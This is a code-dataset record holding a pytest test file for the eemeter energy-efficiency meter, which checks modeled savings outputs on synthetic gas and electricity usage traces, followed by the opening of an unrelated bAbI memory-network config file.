tests/ee/test_energy_efficiency_meter.py | OpenTechStrategies/eemeter | ed38b00c665cf0eb0aa68e9b2a4cd190b5bcf7ca | ["Apache-2.0"] | null | null | null |
tests/ee/test_energy_efficiency_meter.py | OpenTechStrategies/eemeter | ed38b00c665cf0eb0aa68e9b2a4cd190b5bcf7ca | ["Apache-2.0"] | 1 | 2018-06-14T04:24:49.000Z | 2018-06-14T04:24:49.000Z |
tests/ee/test_energy_efficiency_meter.py | OpenTechStrategies/eemeter | ed38b00c665cf0eb0aa68e9b2a4cd190b5bcf7ca | ["Apache-2.0"] | null | null | null |
from io import BytesIO
import numpy as np
import re
import pkg_resources
import tempfile
import pandas as pd
import pytest
import pytz
import json
from eemeter.ee.meter import EnergyEfficiencyMeter
from eemeter.modeling.formatters import ModelDataBillingFormatter
from eemeter.modeling.models import CaltrackMonthlyModel, CaltrackDailyModel
@pytest.fixture
def project_meter_input():
return {
"type": "PROJECT_WITH_SINGLE_MODELING_PERIOD_GROUP",
"zipcode": "91104",
"project_id": "PROJECT_1",
"modeling_period_group": {
"baseline_period": {
"start": None,
"end": "2014-01-01T00:00:00+00:00"
},
"reporting_period": {
"start": "2014-02-01T00:00:00+00:00",
"end": None
}
}
}
@pytest.fixture
def project_meter_input_bad_zipcode():
return {
"type": "PROJECT_WITH_SINGLE_MODELING_PERIOD_GROUP",
"zipcode": "11111", # not valid
"modeling_period_group": {
"baseline_period": {
"start": None,
"end": "2014-01-01T00:00:00+00:00"
},
"reporting_period": {
"start": "2014-02-01T00:00:00+00:00",
"end": None
}
}
}
@pytest.fixture
def project_meter_input_with_period_start_end():
return {
"type": "PROJECT_WITH_SINGLE_MODELING_PERIOD_GROUP",
"zipcode": "91104",
"project_id": "PROJECT_1",
"modeling_period_group": {
"baseline_period": {
"start": "2013-01-01T00:00:00+00:00",
"end": "2014-01-01T00:00:00+00:00"
},
"reporting_period": {
"start": "2014-02-01T00:00:00+00:00",
"end": "2015-02-01T00:00:00+00:00",
}
}
}
def _electricity_input(records):
return {
"type": "ARBITRARY_START",
"interpretation": "ELECTRICITY_CONSUMPTION_SUPPLIED",
"unit": "KWH",
"records": records
}
def _natural_gas_input(records):
return {
"type": "ARBITRARY_START",
"interpretation": "NATURAL_GAS_CONSUMPTION_SUPPLIED",
"unit": "THERM",
"trace_id": "TRACE_1",
"records": records
}
@pytest.fixture
def meter_input_daily(project_meter_input):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 4, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
trace = _natural_gas_input(records)
trace.update({'interval': 'daily'})
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": trace,
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_hourly(project_meter_input):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 4 * 24, freq='H', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0 + dt.hour,
"estimated": False
} for dt in record_starts
]
trace = _natural_gas_input(records)
trace.update({'interval': 'hourly'})
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": trace,
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_daily_elec(project_meter_input):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 4, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
trace = _electricity_input(records)
trace.update({'interval': 'daily'})
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": trace,
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_empty(project_meter_input):
records = []
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": _natural_gas_input(records),
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_daily_baseline_only(project_meter_input):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 1, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": _natural_gas_input(records),
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_daily_reporting_only(project_meter_input):
record_starts = pd.date_range(
'2014-02-01', periods=365 * 1, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": _natural_gas_input(records),
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_daily_with_period_start_end(
project_meter_input_with_period_start_end):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 4, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
trace = _natural_gas_input(records)
trace.update({'interval': 'daily'})
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": trace,
"project": project_meter_input_with_period_start_end,
}
return meter_input
@pytest.fixture
def meter_input_monthly(project_meter_input):
record_starts = pd.date_range(
'2012-01-01', periods=60, freq='MS', tz=pytz.UTC)
monthly_heating_cooling_pattern = {
1: 31,
2: 31,
3: 25,
4: 13,
5: 0,
6: 12,
7: 19,
8: 19,
9: 13,
10: 1,
11: 12,
12: 24,
}
records = [
{
"start": dt.isoformat(),
"value": monthly_heating_cooling_pattern[dt.month],
"estimated": False
} for dt in record_starts
]
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": _electricity_input(records),
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_strange_interpretation(project_meter_input):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 4, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": {
"type": "ARBITRARY_START",
"interpretation": "ELECTRICITY_CONSUMPTION_NET",
"unit": "therm",
"records": records
},
"project": project_meter_input
}
return meter_input
@pytest.fixture
def meter_input_bad_zipcode(project_meter_input_bad_zipcode):
record_starts = pd.date_range(
'2012-01-01', periods=50, freq='MS', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": _electricity_input(records),
"project": project_meter_input_bad_zipcode,
}
return meter_input
def test_basic_usage_daily(
meter_input_daily, monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['project_id'] == 'PROJECT_1'
assert results['trace_id'] == 'TRACE_1'
assert results['interval'] == 'daily'
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
series_by_name = {d['series']: d for d in derivatives}
baseline_observed = series_by_name['Observed, baseline period']
reporting_observed = series_by_name['Observed, reporting period']
assert (baseline_observed['orderable'][0], baseline_observed['orderable'][-1]) == ('2012-01-01T00:00:00+00:00', '2014-01-01T00:00:00+00:00')
assert (reporting_observed['orderable'][0], reporting_observed['orderable'][-1]) == ('2014-02-01T00:00:00+00:00', '2015-12-30T00:00:00+00:00')
assert len(derivatives) == 32
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
'Baseline model, normal year',
'Cumulative reporting model, normal year',
'Baseline model minus reporting model, normal year',
'Baseline model, normal year',
'Reporting model, normal year',
'Baseline model, baseline period',
'Cumulative baseline model minus observed, reporting period',
'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
'Baseline model minus observed, reporting period',
'Baseline model, reporting period',
'Observed, reporting period',
'Masked baseline model minus observed, reporting period',
'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_basic_usage_daily_supplied_weather_source(
meter_input_daily, monkeypatch_temperature_data,
mock_isd_weather_source):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily,
weather_source=mock_isd_weather_source)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['project_id'] == 'PROJECT_1'
assert results['trace_id'] == 'TRACE_1'
assert results['interval'] == 'daily'
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
series_by_name = {d['series']: d for d in derivatives}
baseline_observed = series_by_name['Observed, baseline period']
reporting_observed = series_by_name['Observed, reporting period']
assert (baseline_observed['orderable'][0], baseline_observed['orderable'][-1]) == ('2012-01-01T00:00:00+00:00', '2014-01-01T00:00:00+00:00')
assert (reporting_observed['orderable'][0], reporting_observed['orderable'][-1]) == ('2014-02-01T00:00:00+00:00', '2015-12-30T00:00:00+00:00')
assert len(derivatives) == 32
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
'Baseline model, normal year',
'Cumulative reporting model, normal year',
'Baseline model minus reporting model, normal year',
'Baseline model, normal year',
'Reporting model, normal year',
'Baseline model, baseline period',
'Cumulative baseline model minus observed, reporting period',
'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
'Baseline model minus observed, reporting period',
'Baseline model, reporting period',
'Observed, reporting period',
'Masked baseline model minus observed, reporting period',
'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_basic_usage_monthly(
meter_input_monthly,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_monthly)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
assert len(derivatives) == 36
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
'Baseline model, normal year',
'Cumulative reporting model, normal year',
'Baseline model minus reporting model, normal year',
'Reporting model, normal year',
'Cumulative baseline model minus observed, reporting period',
'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
'Baseline model minus observed, reporting period',
'Baseline model, reporting period',
'Observed, reporting period',
'Masked baseline model minus observed, reporting period',
'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
'Best-fit heating coefficient, baseline period',
'Best-fit heating coefficient, reporting period',
'Best-fit cooling coefficient, baseline period',
'Best-fit cooling coefficient, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_basic_usage_baseline_only(
meter_input_daily_baseline_only,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily_baseline_only)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
assert len(derivatives) == 18
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
# 'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
# 'Cumulative reporting model, normal year',
# 'Baseline model minus reporting model, normal year',
'Baseline model, normal year',
# 'Reporting model, normal year',
# 'Cumulative baseline model minus observed, reporting period',
# 'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
# 'Baseline model minus observed, reporting period',
# 'Baseline model, reporting period',
'Observed, reporting period',
# 'Masked baseline model minus observed, reporting period',
# 'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
#'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
#'Heating degree day balance point, reporting period',
#'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
#'Best-fit intercept, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_basic_usage_reporting_only(
meter_input_daily_reporting_only,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily_reporting_only)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
assert len(derivatives) == 18
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
assert derivatives[0]['value'] is not None
assert derivatives[0]['variance'] is not None
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
# 'Cumulative baseline model minus reporting model, normal year',
# 'Cumulative baseline model, normal year',
'Cumulative reporting model, normal year',
# 'Baseline model minus reporting model, normal year',
# 'Baseline model, normal year',
'Reporting model, normal year',
# 'Cumulative baseline model minus observed, reporting period',
# 'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
# 'Baseline model minus observed, reporting period',
# 'Baseline model, reporting period',
'Observed, reporting period',
# 'Masked baseline model minus observed, reporting period',
# 'Masked baseline model, reporting period',
'Masked observed, reporting period',
#'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
#'Heating degree day balance point, baseline period',
#'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
#'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_basic_usage_empty(
meter_input_empty,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_empty)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert results['modeled_energy_trace'] is not None
assert len(results['derivatives']) == 0
def test_bad_meter_input(monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate({})
assert results['status'] == 'FAILURE'
assert results['failure_message'].startswith("Meter input")
def test_strange_interpretation(meter_input_strange_interpretation,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_strange_interpretation)
assert results['status'] == 'FAILURE'
assert results['failure_message'].startswith("Default formatter")
def test_bad_zipcode(meter_input_bad_zipcode):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_bad_zipcode)
assert results['project_id'] is None
assert results['trace_id'] is None
assert results['interval'] is None
derivatives = results['derivatives']
assert len(derivatives) == 8
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
# 'Cumulative baseline model minus reporting model, normal year',
# 'Cumulative baseline model, normal year',
# 'Cumulative reporting model, normal year',
# 'Baseline model minus reporting model, normal year',
# 'Baseline model, normal year',
# 'Reporting model, normal year',
# 'Cumulative baseline model minus observed, reporting period',
# 'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
# 'Baseline model minus observed, reporting period',
# 'Baseline model, reporting period',
'Observed, reporting period',
# 'Masked baseline model minus observed, reporting period',
# 'Masked baseline model, reporting period',
'Masked observed, reporting period',
#'Baseline model, baseline period',
#'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
# 'Temperature, baseline period',
# 'Temperature, reporting period',
# 'Temperature, normal year',
# 'Masked temperature, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_custom_evaluate_args_monthly(
meter_input_monthly,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_monthly,
model=None,
formatter=None)
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': True, 'grid_search': True}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
results = meter.evaluate(meter_input_monthly,
model=(None, None),
formatter=(None, None))
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': True, 'grid_search': True}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
results = meter.evaluate(meter_input_monthly,
model=('CaltrackMonthlyModel', None),
formatter=('ModelDataBillingFormatter', None))
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
results = meter.evaluate(meter_input_monthly,
model=(None, {"fit_cdd": False}))
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': False, 'grid_search': True}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
results = meter.evaluate(meter_input_monthly,
model=(None, {"fit_cdd": False}),
formatter=(None, {}))
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': False, 'grid_search': True}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
results = meter.evaluate(meter_input_monthly,
model=(CaltrackMonthlyModel, {"fit_cdd": False}),
formatter=(ModelDataBillingFormatter, {}))
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': False}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
def test_custom_evaluate_args_daily(
meter_input_daily_elec,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily_elec,
model=None,
formatter=None)
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] == {'fit_cdd': True, 'grid_search': True}
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] == {'freq_str': 'D'}
results = meter.evaluate(meter_input_daily_elec,
model=(CaltrackDailyModel, {'fit_cdd': False}),
formatter=None)
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] == {'fit_cdd': False}
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] == {'freq_str': 'D'}
def test_ignore_extra_args_daily(
meter_input_daily_elec,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily_elec,
model=(None, {'fit_cdd': True, 'grid_search': True, 'extra_arg': 'value'}),
formatter=None)
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] == {'fit_cdd': True, 'grid_search': True, 'extra_arg': 'value'}
def test_ignore_extra_args_monthly(
meter_input_monthly,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_monthly,
model=(None, {'grid_search': True, 'extra_arg': 'value'}),
formatter=None)
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': True, 'grid_search': True, 'extra_arg': 'value'}
def test_basic_usage_daily_period_start_end(
meter_input_daily_with_period_start_end,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily_with_period_start_end)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['project_id'] == 'PROJECT_1'
assert results['trace_id'] == 'TRACE_1'
assert results['interval'] == 'daily'
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
assert len(derivatives) == 32
    by_series = {d['series']: d for d in derivatives}
    baseline_observed = by_series['Observed, baseline period']
    reporting_observed = by_series['Observed, reporting period']
    assert (baseline_observed['orderable'][0], baseline_observed['orderable'][-1]) == \
        ('2013-01-01T00:00:00+00:00', '2014-01-01T00:00:00+00:00')
    assert (reporting_observed['orderable'][0], reporting_observed['orderable'][-1]) == \
        ('2014-02-01T00:00:00+00:00', '2015-02-01T00:00:00+00:00')
assert derivatives[0]['modeling_period_group'] == ('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
'Cumulative reporting model, normal year',
'Baseline model minus reporting model, normal year',
'Baseline model, normal year',
'Reporting model, normal year',
'Cumulative baseline model minus observed, reporting period',
'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
'Baseline model minus observed, reporting period',
'Baseline model, reporting period',
'Observed, reporting period',
'Masked baseline model minus observed, reporting period',
'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_meter_settings_cz2010(meter_input_daily):
meter = EnergyEfficiencyMeter(
weather_station_mapping='CZ2010',
weather_normal_station_mapping='CZ2010'
)
assert meter.weather_station_mapping == 'CZ2010'
assert meter.weather_normal_station_mapping == 'CZ2010'
results = meter.evaluate(meter_input_daily)
assert results['logs'][0] == 'Using weather_source ISDWeatherSource("722874")'
assert results['logs'][1] == 'Using weather_normal_source CZ2010WeatherSource("722874")'
assert results['status'] == 'SUCCESS'
assert results['meter_kwargs'] == {
'weather_station_mapping': 'CZ2010',
'weather_normal_station_mapping': 'CZ2010'
}
def test_basic_usage_hourly(
meter_input_hourly, monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_hourly)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['project_id'] == 'PROJECT_1'
assert results['trace_id'] == 'TRACE_1'
assert results['interval'] == 'hourly'
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
    by_series = {d['series']: d for d in derivatives}
    baseline_observed = by_series['Observed, baseline period']
    reporting_observed = by_series['Observed, reporting period']
    assert (baseline_observed['orderable'][0], baseline_observed['orderable'][-1]) == \
        ('2012-01-01T00:00:00+00:00', '2014-01-01T00:00:00+00:00')
    assert (reporting_observed['orderable'][0], reporting_observed['orderable'][-1]) == \
        ('2014-02-01T00:00:00+00:00', '2015-12-30T00:00:00+00:00')
assert len(derivatives) == 35
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
'Cumulative reporting model, normal year',
'Baseline model minus reporting model, normal year',
'Baseline model, normal year',
'Reporting model, normal year',
'Cumulative baseline model minus observed, reporting period',
'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
'Baseline model minus observed, reporting period',
'Baseline model, reporting period',
'Observed, reporting period',
'Masked baseline model minus observed, reporting period',
'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
'Resource curve, normal year',
'Resource curve, reporting period',
'CO2 avoided emissions, normal year',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
[per-file quality-signal columns for the preceding record omitted]
hexsha: 1ea66eab3ba87442961e7ebf0fa2beadf53afb7e | size: 4,441 | ext: py | lang: Python
path: config.py | repo: parakrama1995/mem | head: 253f506ca176c691da09bab4f84e6e4c7a396730 | licenses: ["BSD-3-Clause"]
stars: 645 (2016-01-10T21:24:39.000Z to 2022-03-08T06:15:56.000Z) | issues: 17 (2016-05-06T14:30:48.000Z to 2021-07-03T20:28:32.000Z) | forks: 188 (2016-01-11T00:34:48.000Z to 2021-09-30T19:13:48.000Z)
content:
import numpy as np
class BabiConfig(object):
"""
Configuration for bAbI
"""
def __init__(self, train_story, train_questions, dictionary):
self.dictionary = dictionary
self.batch_size = 32
self.nhops = 3
self.nepochs = 100
self.lrate_decay_step = 25 # reduce learning rate by half every 25 epochs
# Use 10% of training data for validation
nb_questions = train_questions.shape[1]
nb_train_questions = int(nb_questions * 0.9)
self.train_range = np.array(range(nb_train_questions))
